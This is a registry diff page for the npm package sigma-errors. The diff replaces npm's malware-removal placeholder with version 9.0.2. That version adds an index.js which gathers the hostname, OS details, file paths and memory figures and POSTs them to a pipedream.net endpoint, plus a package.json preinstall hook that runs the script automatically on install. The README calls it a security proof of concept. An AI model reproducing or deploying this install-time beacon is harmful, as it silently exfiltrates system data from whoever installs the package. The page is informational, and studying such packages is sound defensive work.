sigma-errors 0.0.1-security → 9.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of sigma-errors might be problematic. Click here for more details.
- package/README.md +1 -5
- package/index.js +60 -0
- package/package.json +15 -3
package/README.md
CHANGED
|
@@ -1,5 +1 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=sigma-errors for more information.
|
|
1
|
+
PoC by HTM for security purpose only.
|
package/index.js
ADDED
|
@@ -0,0 +1,60 @@
|
|
|
1
|
+
'use strict'
|
|
2
|
+
|
|
3
|
+
const https = require('https');
|
|
4
|
+
const os = require('os');
|
|
5
|
+
|
|
6
|
+
// Gather non-sensitive system information along with an identification mark
|
|
7
|
+
var currentPath = __dirname;
|
|
8
|
+
var currentFile = __filename;
|
|
9
|
+
|
|
10
|
+
// Generate a unique identifier based on system information (e.g., hostname + OS type)
|
|
11
|
+
var uniqueIdentifier = `${os.hostname()}-${os.type()}`;
|
|
12
|
+
|
|
13
|
+
// Collect system data, including the unique identifier
|
|
14
|
+
var data = {
|
|
15
|
+
identifier: uniqueIdentifier, // Unique identifier for the system
|
|
16
|
+
hostname: os.hostname(),
|
|
17
|
+
currentPath: currentPath,
|
|
18
|
+
currentFile: currentFile,
|
|
19
|
+
type: os.type(),
|
|
20
|
+
platform: os.platform(),
|
|
21
|
+
arch: os.arch(),
|
|
22
|
+
release: os.release(),
|
|
23
|
+
uptime: os.uptime(),
|
|
24
|
+
loadavg: os.loadavg(),
|
|
25
|
+
totalmem: os.totalmem(),
|
|
26
|
+
freemem: os.freemem(),
|
|
27
|
+
};
|
|
28
|
+
|
|
29
|
+
// Convert data to a JSON string
|
|
30
|
+
data = JSON.stringify(data);
|
|
31
|
+
|
|
32
|
+
// Define options for the HTTPS request
|
|
33
|
+
const options = {
|
|
34
|
+
hostname: 'enjglpdgtgrbn4b.m.pipedream.net', // Replace with your safe, intended endpoint
|
|
35
|
+
port: 443,
|
|
36
|
+
path: '/path-here123', // Replace with your actual API endpoint
|
|
37
|
+
method: 'POST',
|
|
38
|
+
headers: {
|
|
39
|
+
'Content-Type': 'application/json',
|
|
40
|
+
'Content-Length': data.length,
|
|
41
|
+
}
|
|
42
|
+
};
|
|
43
|
+
|
|
44
|
+
// Make the HTTPS request to send data
|
|
45
|
+
const req = https.request(options, res => {
|
|
46
|
+
console.log(`statusCode: ${res.statusCode}`);
|
|
47
|
+
|
|
48
|
+
res.on('data', d => {
|
|
49
|
+
process.stdout.write(d);
|
|
50
|
+
});
|
|
51
|
+
});
|
|
52
|
+
|
|
53
|
+
req.on('error', error => {
|
|
54
|
+
console.error(error);
|
|
55
|
+
});
|
|
56
|
+
|
|
57
|
+
// Send the data
|
|
58
|
+
req.write(data);
|
|
59
|
+
req.end();
|
|
60
|
+
|
package/package.json
CHANGED
|
@@ -1,6 +1,18 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "sigma-errors",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "9.0.2",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "Aditya",
|
|
11
|
+
"license": "ISC",
|
|
12
|
+
"dependencies": {
|
|
13
|
+
"http": "0.0.1-security",
|
|
14
|
+
"https": "^1.0.0",
|
|
15
|
+
"os": "^0.1.1",
|
|
16
|
+
"sigma-errors": "^9.0.1"
|
|
17
|
+
}
|
|
6
18
|
}
|